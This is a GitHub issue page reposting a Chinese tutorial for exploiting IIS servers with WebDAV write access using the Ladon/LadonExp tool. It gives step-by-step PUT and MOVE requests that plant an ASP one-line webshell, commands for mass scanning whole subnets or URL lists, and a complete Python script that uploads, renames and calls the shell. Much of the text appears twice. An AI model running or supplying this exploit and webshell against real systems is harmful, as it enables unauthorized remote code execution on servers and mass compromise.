We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
原文:http://k8gege.org/Ladon/iisput
LadonExp生成器使用教程之IIS写权限漏洞利用,含环境配置、EXP生成、批量利用、Pyhton复现代码。
该漏洞的产生原因来源于服务器配置不当造成,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。
1 启用webdav组件 2 目录给写权限(为了方便直接eveyone完全写入权限) 3 脚本资源访问权限(不然MOVE失败即无法GetShell)
使用LadonEXP可轻松复现此类漏洞,在Ladon改名前(Cscan)已复现过Tomcat,详情参考Tomcat CVE-2017-12615视频: https://github.com/k8gege/K8CScan/tree/master/Video
功能:上传123.TXT Target: http://192.168.1.22 Method: Put addurl: 123.txt Data: <%eval request(k8gege)%> 点击buildexe->TestExe测试 成功返回 Created
功能:将123.txt改名1.asp Target: http://192.168.1.22/123.txt Method: Move Destination: http://192.168.1.22/1.asp
点击buildexe->TestExe测试 成功返回 Created
PS: 当然也可以直接PUT写入可解析的其它格式,也不一定非得先PUT再MOVE才能GetShell
扫描C段,当然也可以A段B段
Ladon 192.168.1.1/c 生成.dll Ladon 192.168.1.1/24 生成.dll
url.txt里放批量地址,不在同一个段的,示例如下 http://192.168.1.1 http://192.10.5.8:808
Ladon 生成.dll
Python实现利用代码
#encoding="utf-8" import requests put_url = 'http://192.168.1.22/2.txt' move_url = 'http://192.168.1.22/2.txt' move_headers = { 'Destination':'http://192.168.1.22/shell.asp' } put_data = "<%eval request('k8gege')%>" post_data = { '#':'' } try: response = requests.request('PUT',url=put_url,data=put_data) if response.status_code == 200: response = requests.request('MOVE',url=move_url,headers=move_headers) if response.status_code == 207: response = requests.post(url='http://192.168.1.22/shell.asp',data=post_data) print(response.content.decode("gb2312")) else: print(response.status_code) except: pass
最新版本:https://k8gege.org/Download 历史版本: https://github.com/k8gege/Ladon/releases IIS Exp: https://github.com/k8gege/iisput
The text was updated successfully, but these errors were encountered:
No branches or pull requests
原文:http://k8gege.org/Ladon/iisput
LadonExp生成器使用教程之IIS写权限漏洞利用,含环境配置、EXP生成、批量利用、Pyhton复现代码。
漏洞成因
该漏洞的产生原因来源于服务器配置不当造成,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。
IIS配置
1 启用webdav组件
2 目录给写权限(为了方便直接eveyone完全写入权限)
3 脚本资源访问权限(不然MOVE失败即无法GetShell)
漏洞复现
使用LadonEXP可轻松复现此类漏洞,在Ladon改名前(Cscan)已复现过Tomcat,详情参考Tomcat CVE-2017-12615视频: https://github.com/k8gege/K8CScan/tree/master/Video
LadonExp配置PUT
功能:上传123.TXT
Target: http://192.168.1.22
Method: Put
addurl: 123.txt
Data: <%eval request(k8gege)%>
点击buildexe->TestExe测试
成功返回 Created
LadonExp配置MOVE
功能:将123.txt改名1.asp
Target: http://192.168.1.22/123.txt
Method: Move
Destination: http://192.168.1.22/1.asp
点击buildexe->TestExe测试
成功返回 Created
PS: 当然也可以直接PUT写入可解析的其它格式,也不一定非得先PUT再MOVE才能GetShell
Ladon批量
扫描C段,当然也可以A段B段
TXT批量
url.txt里放批量地址,不在同一个段的,示例如下
http://192.168.1.1
http://192.10.5.8:808
Exploit
Python实现利用代码
工具下载
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
IIS Exp: https://github.com/k8gege/iisput
The text was updated successfully, but these errors were encountered: